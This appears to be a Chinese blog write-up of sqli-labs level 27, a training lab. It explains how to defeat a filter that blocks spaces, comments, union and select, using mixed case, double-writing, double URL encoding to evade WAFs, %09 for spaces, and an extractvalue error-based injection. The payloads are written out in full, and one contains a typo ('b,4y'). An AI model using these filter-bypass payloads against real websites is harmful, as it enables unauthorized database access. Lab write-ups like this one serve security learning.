当前位置: 首页 > news >正文

sqli-labs第二十七关——Trick with selectunion

进去之后,可以看见提示这一关新屏蔽了union 和 select,查看源码

确定:/*,--+,#,spaces,union,select,union,select的大小写均被屏蔽了

 总结一下:

sql注入绕过技术

  • 大小写绕过:任意字母大小写,如and→ANd / AND / anD
  • 双写绕过:or→oror / oorr
  • url编码(两次):

                原理:.WAF(web应用防火墙)只解码一次,但后端服务器解码两次

                例如:空格的url解码是%20,我们要对%20再次编码

                                %→%25,数字保持不变,也就是最终变成%2520(不用双重全编码(%25%32%30),这个已经足够高效并且能绕过多数WAF了)

这一关我们用大小写绕过,空格过滤用%09绕过,and与or用&&与||绕过,union改成UNIon,select改成SELEct,结尾注释符号仍然用 ||'

一:判断注入类型

输入 ?id=1' 和 ?id=1') 的时候报错

尝试闭合 ,单引号闭合成功

?id=1'||'

二:开始注入

1.爆列数

?id=1'%09oRdeR%09b,4y%091,2,3,4||'

四列

2.爆回显位 

?id=-1'%09UNIon%09SELEct%091,database(),3%09||'

无回显,使用报错注入

3.爆数据库名字

?id=1'%09and%09extractvalue(1,concat(0x7e,database()))||'

 ❀❀❀ 完结撒花!!!❀❀❀

 

相关文章:

  • Queue 与 Deque 有什么区别?
  • 人工智能第一币AISPF,首发BitMart交易所
  • C++笔记-哈希表
  • etcd之etcd curl命令(七)
  • 《反事实棱镜:折射因果表征学习的深层逻辑》
  • AI时代新词-私有数据与AI结合的技术:隐私保护与数据利用的平衡
  • 多头注意力 vs 单头注意力:计算量与参数量区别
  • 游戏行业DDoS防护:基于IP信誉库的实时拦截方案
  • 【数据集】基于ubESTARFM法的100m 地温LST数据集(澳大利亚)
  • 批量转存夸克网盘内容并分享实操教程
  • 002大模型-提示词工程,少样本提示,角色扮演,思维链
  • Axure元件动作七:移动、旋转、启用/禁用效果、置于顶层/底层详解
  • 2025-05-26 什么是“AI 全栈”
  • 离线安装Microsoft 照片【笔记】
  • 通配符滥用详解:Linux命令行的潜在风险
  • 【逆向 | CTF】攻防世界 Reversing-x64Elf-100 二次解密
  • 第1章第1节:安全运维基础思维与体系建设-安全运维的定义与核心目标
  • 题目 3331: 蓝桥杯2025年第十六届省赛真题-LQ 图形
  • 遥感四十号 02 组卫星发射成功遥感科普:电磁环境探测
  • esp8266 点灯科技远程控制继电器
  • 2019做网站需要营业执照吗/网络整合营销4i原则是指
  • 各大中文网站/今日热点新闻事件摘抄
  • 专业网站建设新闻/php免费开源crm系统
  • 适合做网站的图片/重庆快速排名优化
  • 网页制作网站素材/人力资源培训
  • 广东品牌网站建设多少钱/图片扫一扫在线识别照片